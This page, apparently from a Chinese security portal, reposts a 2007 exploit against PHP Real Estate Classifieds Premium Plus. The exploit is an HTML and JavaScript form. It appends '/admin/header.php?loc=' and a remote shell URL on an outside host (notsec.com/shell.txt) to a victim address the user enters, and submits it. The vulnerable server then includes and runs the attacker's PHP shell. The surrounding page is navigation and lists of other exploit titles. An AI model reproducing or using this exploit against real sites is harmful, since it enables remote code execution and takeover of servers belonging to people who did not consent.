首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHP Real Estate Classifieds Remote File Inclusion Exploit 来源：http://notsec.com 作者：notsec 发布时间：2007-06-12   <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>PHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion Exploit</title> <script language="JavaScript"> //=============================================================================================== //[Script Name: PHP Real Estate Classifieds Premium Plus //[               not sec group //[Author     : http://notsec.com //[Email      : info@notsec.com //=============================================================================================== //developers page:  http://phprealestatescript.com/    var path="/admin/"    var adres="header.php"    var acik ="?loc="    var shell="http://notsec.com/shell.txt" // put THE php shell here    function command(){        if (document.rfi.target1.value==""){           alert("Failed..");       return false;     }   rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready   rfi.submit();    } </script> </head> <body bgcolor="white"> <center> <p><b><font face="Arial" size="1" color="black">PHP Real Estate (header.php) Remote File Inclusion Exploit</font></b></p> <p> <form method="post" target="getting" name="rfi" onSubmit="command();">     <b><font face="verdana" size="1" color="black">Target:</font> <font face="verdana" size="1" color="black">[http://[vittima]/[path]</font><font color="black" size="2" face="Tahoma">   </font><font color="white" size="1">&nbsp;</font></b>   <input type="text" name="target1" size="10" style="background-color: white" onmouseover="javascript:this.style.background=\'white\';" onmouseout="javascript:this.style.background=\'white\';"></p>   <p><input type="submit" value="submit" name="B1"><input type="reset" value="reset" name="B2"></p> </form> <p><br> <iframe name="getting" height="400" width="650" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="verdana" size="1" color="gray"># notsec.com [08-06-2007]</font></b><p></b></p> </p> </center> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·e-Vision CMS <= 2.02 SQL Injec ·Internet Download Accelerator ·Yahoo! Messenger Webcam 8.1 (Y ·Ace-FTP Client 1.24a Remote Bu ·Yahoo! Messenger Webcam 8.1 (Y ·TEC-IT TBarCode OCX ActiveX Re ·MoviePlay 4.76 .lst File Local ·Safari 3 for Windows Beta Remo ·Zenturi ProgramChecker ActiveX ·Fuzzylime Forum 1.0 (low.php t ·Microsoft Windows Animated Cur ·Microsoft Speech API ActiveX c   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved